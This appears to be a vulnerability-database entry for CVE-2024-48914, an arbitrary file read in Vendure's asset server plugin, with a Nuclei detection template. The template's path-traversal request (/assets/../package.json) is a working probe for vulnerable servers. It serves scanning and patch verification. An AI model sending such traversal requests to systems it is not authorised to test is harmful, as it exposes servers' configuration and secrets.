CVE-2024-48914: Vendure - Arbitrary File Read

日期: 2025-08-01 | 影响软件: Vendure | POC: 已公开

漏洞描述

Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.

PoC代码[已公开]

id: CVE-2024-48914

info:
  name: Vendure - Arbitrary File Read
  author: s4e-io
  severity: critical
  description: |
    Vendure is an open-source headless commerce platform. Prior to versions 3.0.5 and 2.3.3, a vulnerability in Vendure's asset server plugin allows an attacker to craft a request which is able to traverse the server file system and retrieve the contents of arbitrary files, including sensitive data such as configuration files, environment variables, and other critical data stored on the server. In the same code path is an additional vector for crashing the server via a malformed URI.
  impact: |
    Allows attackers to read arbitrary files on the server, including sensitive data such as configuration files and environment variables.
  remediation: |
    Patches are available in versions 3.0.5 and 2.3.3. Some workarounds are also available. One may use object storage rather than the local file system, e.g. MinIO or S3, or define middleware which detects and blocks requests with urls containing `/../`.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48914
    - https://github.com/EQSTLab/CVE-2024-48914
    - https://github.com/vendure-ecommerce/vendure
    - https://github.com/vendure-ecommerce/vendure/blob/801980e8f599c28c5059657a9d85dd03e3827992/packages/asset-server-plugin/src/plugin.ts#L352-L358
    - https://github.com/vendure-ecommerce/vendure/commit/e2ee0c43159b3d13b51b78654481094fdd4850c5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2024-48914
    cwe-id: CWE-20
    epss-score: 0.9093
    epss-percentile: 0.99619
  metadata:
    verified: true
    max-request: 1
    vendor: vendure-ecommerce
    product: vendure
    fofa-query: "Vendure"
  tags: cve,cve2024,vendure,lfi,file-read,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/assets/../package.json"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "name", "version", "main" ,"license")'
          - 'contains(content_type, "application/octet-stream")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022067a2cf1fcce6bda1a3ec88668b479e9130413a7be8f5aa1aff65d1d9dac86c8a022100cf0b1e69891f500530d3bb8c3cf978c28a42fd553aede17d1a7b617901b9130c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐